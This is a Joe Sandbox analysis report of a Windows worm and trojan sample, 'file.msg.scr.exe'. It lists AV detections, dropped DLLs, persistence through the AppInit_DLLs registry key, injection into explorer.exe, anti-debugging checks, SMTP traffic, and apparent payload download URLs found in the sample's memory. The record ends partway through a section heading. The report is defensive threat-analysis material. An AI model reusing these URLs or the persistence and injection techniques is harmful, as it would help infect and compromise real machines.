Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.msg.scr.exe

Overview

General Information

Sample Name:file.msg.scr.exe
Analysis ID:877404
MD5:6b7ed3abdd8484b313948ba83fde717f
SHA1:2318e1d65cef538f1cf88e2235a5dd350ff40449
SHA256:eee33ed66c2e88e414a5887043db18edafa2fef889882d751f0448ed360efc44
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Injects files into Windows application
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Uses SMTP (mail sending)

Classification

  • System is w10x64
  • file.msg.scr.exe (PID: 5668 cmdline: C:\Users\user\Desktop\file.msg.scr.exe MD5: 6B7ED3ABDD8484B313948BA83FDE717F)
    • serv.exe (PID: 7028 cmdline: C:\Windows\serv.exe s MD5: 6B7ED3ABDD8484B313948BA83FDE717F)
      • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • serv.exe (PID: 5796 cmdline: "C:\Windows\serv.exe" s MD5: 6B7ED3ABDD8484B313948BA83FDE717F)
          • WerFault.exe (PID: 808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 1284 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 2748 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7028 -s 1420 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • WerFault.exe (PID: 5220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 1556 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • notepad.exe (PID: 5492 cmdline: C:\Windows\System32\notepad.exe C:\Users\user\Desktop\19F3.tmp MD5: D693F13FE3AA2010B854C4C60671B8E2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\SysWOW64\e1.dllSUSP_Imphash_Mar23_3Detects imphash often found in malware samples (Maximum 0,25% hits with search for \'imphash:x p:0\' on Virustotal) = 99,75% hitsArnim Rupp (https://github.com/ruppde)
    C:\Windows\SysWOW64\nwprmp4s.exeSUSP_Imphash_Mar23_3Detects imphash often found in malware samples (Maximum 0,25% hits with search for \'imphash:x p:0\' on Virustotal) = 99,75% hitsArnim Rupp (https://github.com/ruppde)
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: file.msg.scr.exeReversingLabs: Detection: 86%
      Source: file.msg.scr.exeVirustotal: Detection: 83%Perma Link
      Source: file.msg.scr.exeAvira: detected
      Source: C:\Windows\SysWOW64\e1.dllAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
      Source: C:\Windows\SysWOW64\nwprmp4s.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
      Source: C:\Windows\SysWOW64\blacusrv.dllAvira: detection malicious, Label: TR/PWS.Sinowal.Gen5
      Source: C:\Windows\serv.exeAvira: detection malicious, Label: WORM/Stration.C
      Source: C:\Windows\SysWOW64\atmlmcia.dllAvira: detection malicious, Label: WORM/Stration.Gen
      Source: C:\Windows\serv.dllAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
      Source: C:\Windows\SysWOW64\atmlmcia.dllReversingLabs: Detection: 83%
      Source: C:\Windows\SysWOW64\blacusrv.dllReversingLabs: Detection: 68%
      Source: C:\Windows\SysWOW64\e1.dllReversingLabs: Detection: 76%
      Source: C:\Windows\SysWOW64\nwprmp4s.exeReversingLabs: Detection: 78%
      Source: C:\Windows\serv.dllReversingLabs: Detection: 84%
      Source: C:\Windows\serv.exeReversingLabs: Detection: 86%
      Source: file.msg.scr.exeJoe Sandbox ML: detected
      Source: C:\Windows\SysWOW64\nwprmp4s.exeJoe Sandbox ML: detected
      Source: C:\Windows\serv.exeJoe Sandbox ML: detected
      Source: file.msg.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000004.00000000.598856572.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
      Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000004.00000000.598856572.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
      Source: Binary string: eex.pdb source: explorer.exe, 00000004.00000000.598856572.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
      Source: C:\Windows\serv.exeCode function: 2_2_0041BF10 FindFirstFileA,FindFirstFileA,2_2_0041BF10
      Source: Joe Sandbox ViewIP Address: 104.47.18.161 104.47.18.161
      Source: global trafficTCP traffic: 192.168.2.4:49694 -> 67.195.204.79:25
      Source: global trafficTCP traffic: 192.168.2.4:49695 -> 142.250.27.26:25
      Source: global trafficTCP traffic: 192.168.2.4:49696 -> 104.47.18.161:25
      Source: global trafficTCP traffic: 192.168.2.4:49697 -> 67.195.204.74:25
      Source: global trafficTCP traffic: 192.168.2.4:49698 -> 142.250.150.26:25
      Source: explorer.exe, 00000004.00000000.599025218.00007FF883839000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
      Source: explorer.exe, 00000004.00000000.599025218.00007FF883839000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
      Source: serv.exe, 00000002.00000003.602430085.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, serv.exe, 00000002.00000002.614445263.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www4.ertinmdesa-k
      Source: serv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www4.ertinmdesachlion.com/chr/tdg/lt.exe
      Source: serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www4.ertinmdesachlion.com/chr/tdg/lt.exe)
      Source: serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www4.ertinmdesachlion.com/chr/tdg/lt.exe7
      Source: serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www4.ertinmdesachlion.com/chr/tdg/lt.exe=
      Source: serv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www4.ertinmdesachlion.com/chr/tdg/lt.exeX
      Source: serv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www4.ertinmdesachlion.com/chr/tdg/lt.exea
      Source: serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www4.ertinmdesachlion.com/chr/tdg/lt.exeg
      Source: serv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www4.ertinmdesachlion.com/chr/tdg/lt.exen
      Source: serv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www4.ertinmdesachlionY
      Source: serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmp, serv.exe, 00000005.00000002.631240133.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www6.ertinmdesachlion.com/
      Source: serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmp, serv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www6.ertinmdesachlion.com/chr/tdg/nt.exe
      Source: serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www6.ertinmdesachlion.com/chr/tdg/nt.exeT
      Source: serv.exe, 00000005.00000002.631240133.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www6.ertinmdesachlion.com/r
      Source: unknownDNS traffic detected: queries for: yahoo.com
      Source: file.msg.scr.exe, 00000000.00000002.557815283.000000000074A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: file.msg.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Windows\SysWOW64\e1.dll, type: DROPPEDMatched rule: SUSP_Imphash_Mar23_3 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Maximum 0,25% hits with search for \'imphash:x p:0\' on Virustotal) = 99,75% hits, score = b5296cf0eb22fba6e2f68d0c9de9ef7845f330f7c611a0d60007aa87e270c62a, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = fe53b9d820adf3bcddf42976b8af1411e87d9dfd9aa479f12b2db50a5600f348
      Source: C:\Windows\SysWOW64\nwprmp4s.exe, type: DROPPEDMatched rule: SUSP_Imphash_Mar23_3 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Maximum 0,25% hits with search for \'imphash:x p:0\' on Virustotal) = 99,75% hits, score = b5296cf0eb22fba6e2f68d0c9de9ef7845f330f7c611a0d60007aa87e270c62a, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = fe53b9d820adf3bcddf42976b8af1411e87d9dfd9aa479f12b2db50a5600f348
      Source: C:\Windows\serv.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7028 -s 1420
      Source: C:\Users\user\Desktop\file.msg.scr.exeFile created: C:\Windows\serv.exeJump to behavior
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004130400_2_00413040
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0040C0700_2_0040C070
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004128000_2_00412800
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004188E00_2_004188E0
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0040D1C00_2_0040D1C0
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004089800_2_00408980
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0040F9900_2_0040F990
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004242780_2_00424278
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0042C2970_2_0042C297
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004133500_2_00413350
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004143100_2_00414310
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0042C39F0_2_0042C39F
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_00424C0E0_2_00424C0E
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004184D00_2_004184D0
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004106800_2_00410680
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004137700_2_00413770
      Source: C:\Windows\serv.exeCode function: 2_2_004143102_2_00414310
      Source: C:\Windows\serv.exeCode function: 2_2_004130402_2_00413040
      Source: C:\Windows\serv.exeCode function: 2_2_0040C0702_2_0040C070
      Source: C:\Windows\serv.exeCode function: 2_2_004128002_2_00412800
      Source: C:\Windows\serv.exeCode function: 2_2_004188E02_2_004188E0
      Source: C:\Windows\serv.exeCode function: 2_2_0040D1C02_2_0040D1C0
      Source: C:\Windows\serv.exeCode function: 2_2_004089802_2_00408980
      Source: C:\Windows\serv.exeCode function: 2_2_0040F9902_2_0040F990
      Source: C:\Windows\serv.exeCode function: 2_2_004242782_2_00424278
      Source: C:\Windows\serv.exeCode function: 2_2_0042C2972_2_0042C297
      Source: C:\Windows\serv.exeCode function: 2_2_004133502_2_00413350
      Source: C:\Windows\serv.exeCode function: 2_2_0042C39F2_2_0042C39F
      Source: C:\Windows\serv.exeCode function: 2_2_00424C0E2_2_00424C0E
      Source: C:\Windows\serv.exeCode function: 2_2_004184D02_2_004184D0
      Source: C:\Windows\serv.exeCode function: 2_2_004106802_2_00410680
      Source: C:\Windows\serv.exeCode function: 2_2_004137702_2_00413770
      Source: C:\Windows\serv.exeCode function: 2_2_100014702_2_10001470
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: String function: 0042422C appears 46 times
      Source: C:\Windows\serv.exeCode function: String function: 0042422C appears 46 times
      Source: C:\Windows\serv.exeCode function: 2_2_0056184A NtQuerySystemInformation,2_2_0056184A
      Source: C:\Windows\serv.exeCode function: 2_2_0041C400: DeviceIoControl,DeviceIoControl,2_2_0041C400
      Source: file.msg.scr.exeReversingLabs: Detection: 86%
      Source: file.msg.scr.exeVirustotal: Detection: 83%
      Source: C:\Users\user\Desktop\file.msg.scr.exeFile read: C:\Users\user\Desktop\file.msg.scr.exeJump to behavior
      Source: C:\Users\user\Desktop\file.msg.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\file.msg.scr.exe C:\Users\user\Desktop\file.msg.scr.exe
      Source: C:\Users\user\Desktop\file.msg.scr.exeProcess created: C:\Windows\serv.exe C:\Windows\serv.exe s
      Source: C:\Users\user\Desktop\file.msg.scr.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\notepad.exe C:\Users\user\Desktop\19F3.tmp
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\serv.exe "C:\Windows\serv.exe" s
      Source: C:\Windows\serv.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7028 -s 1420
      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 1556
      Source: C:\Windows\serv.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 1284
      Source: C:\Users\user\Desktop\file.msg.scr.exeProcess created: C:\Windows\serv.exe C:\Windows\serv.exe sJump to behavior
      Source: C:\Users\user\Desktop\file.msg.scr.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\notepad.exe C:\Users\user\Desktop\19F3.tmpJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\serv.exe "C:\Windows\serv.exe" sJump to behavior
      Source: C:\Windows\serv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: C:\Windows\serv.exeCode function: 2_2_0041CB80 AdjustTokenPrivileges,AdjustTokenPrivileges,2_2_0041CB80
      Source: C:\Users\user\Desktop\file.msg.scr.exeFile created: C:\Users\user\Desktop\19F3.tmpJump to behavior
      Source: C:\Windows\serv.exeFile created: C:\Users\user\AppData\Local\Temp\~28C3.tmpJump to behavior
      Source: classification engineClassification label: mal100.evad.winEXE@10/20@40/5
      Source: C:\Windows\serv.exeCode function: 2_2_0041B4F0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,2_2_0041B4F0
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2748
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7028
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5796
      Source: C:\Windows\serv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\serv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\serv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\serv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\serv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\serv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\serv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\serv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000004.00000000.598856572.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
      Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000004.00000000.598856572.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
      Source: Binary string: eex.pdb source: explorer.exe, 00000004.00000000.598856572.00007FF883751000.00000020.00000001.01000000.0000000B.sdmp
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_00422920 push eax; ret 0_2_00422934
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_00422920 push eax; ret 0_2_0042295C
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_00424267 push ecx; ret 0_2_00424277
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004232F0 push eax; ret 0_2_0042330E
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_00434285 pushad ; ret 0_2_0043428B
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_00434D58 push ds; ret 0_2_00434D6A
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_00434614 push es; ret 0_2_0043461A
      Source: C:\Windows\serv.exeCode function: 2_2_00422920 push eax; ret 2_2_00422934
      Source: C:\Windows\serv.exeCode function: 2_2_00422920 push eax; ret 2_2_0042295C
      Source: C:\Windows\serv.exeCode function: 2_2_00424267 push ecx; ret 2_2_00424277
      Source: C:\Windows\serv.exeCode function: 2_2_004232F0 push eax; ret 2_2_0042330E
      Source: C:\Windows\serv.exeCode function: 2_2_00434285 pushad ; ret 2_2_0043428B
      Source: C:\Windows\serv.exeCode function: 2_2_00434D58 push ds; ret 2_2_00434D6A
      Source: C:\Windows\serv.exeCode function: 2_2_00434614 push es; ret 2_2_0043461A
      Source: file.msg.scr.exeStatic PE information: section name: .Upack
      Source: serv.exe.0.drStatic PE information: section name: .Upack
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0041F2B0 LoadLibraryA,GetProcAddress,0_2_0041F2B0
      Source: initial sampleStatic PE information: section where entry point is pointing to: .Upack

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\explorer.exeExecutable created and started: C:\Windows\serv.exeJump to behavior
      Source: C:\Windows\serv.exeFile created: C:\Windows\serv.dllJump to dropped file
      Source: C:\Windows\serv.exeFile created: C:\Windows\SysWOW64\e1.dllJump to dropped file
      Source: C:\Windows\serv.exeFile created: C:\Windows\SysWOW64\blacusrv.dllJump to dropped file
      Source: C:\Windows\serv.exeFile created: C:\Windows\SysWOW64\nwprmp4s.exeJump to dropped file
      Source: C:\Users\user\Desktop\file.msg.scr.exeFile created: C:\Windows\serv.exeJump to dropped file
      Source: C:\Windows\serv.exeFile created: C:\Windows\SysWOW64\atmlmcia.dllJump to dropped file
      Source: C:\Windows\serv.exeFile created: C:\Windows\serv.dllJump to dropped file
      Source: C:\Windows\serv.exeFile created: C:\Windows\SysWOW64\e1.dllJump to dropped file
      Source: C:\Windows\serv.exeFile created: C:\Windows\SysWOW64\blacusrv.dllJump to dropped file
      Source: C:\Windows\serv.exeFile created: C:\Windows\SysWOW64\nwprmp4s.exeJump to dropped file
      Source: C:\Users\user\Desktop\file.msg.scr.exeFile created: C:\Windows\serv.exeJump to dropped file
      Source: C:\Windows\serv.exeFile created: C:\Windows\SysWOW64\atmlmcia.dllJump to dropped file

      Boot Survival

      barindex
      Source: C:\Windows\serv.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLsJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
